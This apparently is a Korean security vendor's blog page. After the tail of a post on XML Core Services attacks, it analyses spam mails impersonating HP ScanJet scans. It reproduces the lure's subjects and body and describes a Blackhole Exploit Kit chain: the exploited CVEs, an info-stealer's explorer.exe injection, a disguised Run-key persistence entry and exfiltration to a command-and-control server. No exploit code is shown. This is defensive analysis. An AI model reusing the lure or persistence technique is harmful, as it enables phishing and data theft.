SWF/CVE-2011-0611

JS/Downloader

JS/Redirect

JS/Redirector 

Win-Trojan/Yolped.73728 


이 번에 발견된 XML 코어 서비스 취약점을 악용하는 공격 사례는 앞선 언급한 바와 같이 SQL 인젝션과 같은 공격 기법으로 취약한 웹 사이트를 대상으로 이루어짐으로 웹 사이트 방문시 각별한 주의가 필요하다.


현재 해당 XML 코어 서비스 취약점에 대한 보안 패치가 아직 제공되지 않지만, 마이크로소프트(Microsoft)에서는 임시 방안으로 픽스잇(Fix It)을 공개 중임으로 이를 설치하는 것이 중요하다.


그리고 다른 일반 어플리케이션들의 취약점들도 동반하고 있음으로 평소 자주 사용하는 어플리케이션들의 보안 패치를 설치하는 것도 중요하다.


저작자 표시
신고
Creative Commons License
Creative Commons License
Posted by 비회원

이메일에 첨부되어 스팸 메일(Spam Mail)처럼 유포되는 악성코드들은 대부분이 ZIP으로 압축된 EXE 파일이 첨부되거나 EXE 또는 SCR 등의 파일 확장자를 가진 첨부 파일 형태로 유포되는 것이 일반적이다.


그러나 최근에 와서는 이메일 본문에 단축 URL(URL Shortening) 또는 하이퍼 링크를 제공하여, 특정 악성코드를 유포하는 웹 사이트 또는 피싱(Phishing) 웹 사이트로 연결을 유도하는 형태들도 발견되고 있다.


금일 새벽 국내에 유명 IT 업체인 HP를 사칭하여 악성코드 감염을 유도하는 악의적인 스팸 메일들이 대량으로 유포되었다.


이번에 유포된 악성코드 감염을 목적으로하는 악의적인 스팸 메일은 다음과 같은 형태를 가지고 있다.


* 메일 제목 - 다음 중 하나

Scan from a HP ScanJet #[임의의 숫자열] 

Scan from a Hewlett-Packard ScanJet #[임의의 숫자열]

Scan from a Hewlett-Packard ScanJet [임의의 숫자열]


* 메일 본문

Attached document was scanned and sent


to you using a Hewlett-Packard HP Officejet 1178P.

Sent by: SHAVON

Images : 1

Attachment Type: .HTM [INTERNET EXPLORER]


Hewlett-Packard Officejet Location: machine location not set

Device: [임의의 숫자열]


* 첨부 파일

HP_Doc_06.04-[임의의 숫자열].htm


이 번에 발견된 스팸 메일은 과거의 악성코드를 유포를 목적으로하는 다른 형태의 악의적인 스팸 메일들과는 다른 특징을 보이고 있다. 


해당 스팸 메일은 웹을 기반으로하여 일반 응용프로그램들의 취약점을 악용하는 웹 익스플로잇 툴킷(Web Exploit Toolkit)과 결합하여 다양한 취약점들을 동시에 악용하는 특징을 보이고 있다.


이러한 웹 익스플로잇 툴킷과 결합된 스팸 메일의 전체적인 구조를 도식화하게 되면 아래 이미지와 동일하다.



첨부되어 있는 htm 파일을 실행하게 될 경우에는 웹 브라우저에서는 아래 이미지와 같이 웹 사이트 접속에 잠시 장애가 있는 것으로 위장하고 있다.



그러나 실제 해당 스크립트 파일을 편집기 등으로 확인을 하게 되면, 아래 이미지와 같은 스크립트 코드가 하단에 존재하는 것을 볼 수 있다.



하단에 포함된 스크립트 코드를 디코딩하게 되면 아래 이미지와 같이 러시아에 위치한 시스템으로 접속을 하는 코드가 포함되어 있다.


해당 스크립트 코드가 실제 웹 브라우저에 의해 실행되면 아래 이미지와 같이 러시아에 위치한 특정 시스템으로 연결되도록 구성되어 있으며, 해당 시스템은 웹 익스플로잇 툴킷의 한 형태인 블랙홀 익스플로잇 툴킷(Blackhole Exploit Toolkit)이 설치 되어 있다.



해당 시스템에서는 최초 아래 이미지와 같이 마이크로소프트 인터넷 익스플로러(Microsoft Internet Explorer)에 존재하는 MS06-014 MDAC(Microsoft Data Access Components) 기능의 취약점으로 인한 원격 코드 실행 문제점 (911562) 취약점을 악용하는 스크립트 코드를 전송하게 된다.



그 다음으로는 어도비 아크로뱃 리더(Adobe Acrobat Reader)에 존재하는 Security updates available for Adobe Reader and Acrobat CVE-2010-0188 취약점을 악용하는 PDF 파일을 전송하게 된다.



마지막으로는 자바 애플렛(Java Applet)에 존재하는 Oracle Java SE Critical Patch Update Advisory CVE-2012-0507 취약점을 악용하는 JAR 파일을 전송하게 된다.


위에서 언급한 3가지의 취약점 모두가 정상적으로 악용되지 않을 경우에는 정상 구글(Google) 메인 페이지로 연결하게 된다.



그러나 위 3가지 취약점 중 하나라도 정상적으로 악용될 경우에는 아래 이미지와 같이 동일한 시스템에 존재하는 info.exe (86,016 바이트) 파일을 다운로드하고 실행하게 된다.



해당 익스플로잇 3가지로 인해 다운로드 된 info.exe 파일이 실행되게 되면 윈도우 시스템에 존재하는 정상 explorer.exe 프로세스의 메모리 영역에 자신의 코드를 삽입하게 된다.



자신의 코드가 정상적으로 삽입되면,다음과 같은 경로에 자신의 복사본을 생성하게 된다.


C:\Documents and Settings\[사용자 계정명]\Application Data\KB01458289.exe


그리고 윈도우 시스템이 재실행이 되더라도 자동 실행 되도록 레지스트리(Registry)에 다음의 키를 생성하게 된다.


HKCU\Software\Microsoft\Windows\CurrentVersion\Run 

KB01458289.exe = ""C:\Documents and Settings\[사용자 계정명]\Application Data\KB01458289.exe""


해당 악성코드는 아래 이미지와 같이 내부에 하드코딩 되어 있는 C&C 서버와 암호화된 SSL(Secure Socket Layer) 통신을 시도하게 된다.



정상적으로 접속이 성공하게 될 경우에는 아래 이미지와 같이 암호화 된 데이터를 통신하게 된다.



그리고 공격자의 명령에 따라 인터넷 익스플로러와 파이어폭스(Firefox) 웹 브라우저가 접속을 시도하는 웹 사이트를 모니터링하고, 관련 정보들을 외부로 유출하게 된다.


이 번에 발견된 HP를 사칭하여 악성코드 감염을 목적으로한 악의적인 스팸 메일은 일반 응용프로그램의 취약점을 악용하는 웹 익스플로잇 툴킷과 결합된 형태이다.


이메일 수신인과 관련이 없는 의심스럽거나 수상한 스팸 메일들을 받게되면 메일 자체를 삭제하고, 첨부된 파일은 어떠한 형태라도 실행하지 않는 주의가 필요하다.


그리고 평소 자주 사용하는 응용 프로그램들은 윈도우 보안 패치와 함께 주기적으로 설치하여, 이러한 일반 응용 프로그램들의 취약점을 악용하는 악성코드 감염을 주의하도록한다.


해당 HP를 사칭한 스팸 메일을 통해 감염을 시도하는 악성코드들은 모두 V3 제품군에서 다음과 같이 진단한다.


JS/Iframe

JS/CVE-2006-0003

PDF/CVE-2010-0188

Win-Trojan/Infostealer.86016.F 

Win-Trojan/Downloader.86016.JU

저작자 표시
신고
Creative Commons License
Creative Commons License
Posted by 비회원